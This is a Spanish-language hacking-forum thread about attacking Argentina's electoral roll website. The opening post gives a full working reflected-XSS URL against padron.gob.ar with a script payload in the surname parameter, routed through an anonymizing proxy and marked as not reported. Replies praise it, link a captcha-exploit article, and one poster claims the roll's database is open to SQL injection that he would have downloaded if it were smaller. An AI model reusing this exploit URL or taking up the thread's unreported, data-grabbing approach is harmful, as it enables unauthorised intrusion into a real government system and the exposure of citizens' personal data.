XSS en el padron electoral de Argentina
(http://img46.imageshack.us/img46/3662/padronelectoral.png)
Reportado: NO
URL: http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.padron.gob.ar/consulta/version_impresa.php?x_mat=111111111&x_ape=%3Cscript%3Ealert%28%27ANTRAX%27%29%3C/script%3E&x_nom=los%20nonamesx_sec=7&x_cir=57&x_dess=LaConChinChina&x_desc=CIUDAD&x_desl=&x_dirl=&x_locl=&x_mes=0&x_det=&x_par=0&x_dis=&x_dom=CalleFalsa%20123&x_pro=&x_tip=DNI-EA&x_padron=&x_orden=
Eso es lo de menos, el problema son los datos expuestos xD
Buen XSS :B
Hablando de datos expuestos...
(http://sphotos-e.ak.fbcdn.net/hphotos-ak-prn2/970248_10201389040233493_441973371_n.jpg)
Wow....buen aporte Antrax!
Con eso se demuestra el riesgo de las Aplicaciones Web.... :)
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hablando de datos expuestos...
(http://sphotos-e.ak.fbcdn.net/hphotos-ak-prn2/970248_10201389040233493_441973371_n.jpg)
Me mato de Gorila antes que planero xD
http://www.idontplaydarts.com/2011/05/exploit-phpcaptcha-securimage/
Mmm, si investigan un poquito mas se van a dar cuenta que estan bastante mas fregados que un XSS en la aplicación :)
Es un desastre... La base de datos del padron de Argentina tiene un SQLi... Lastima que son muchas tablas sino la bajaba ajajaja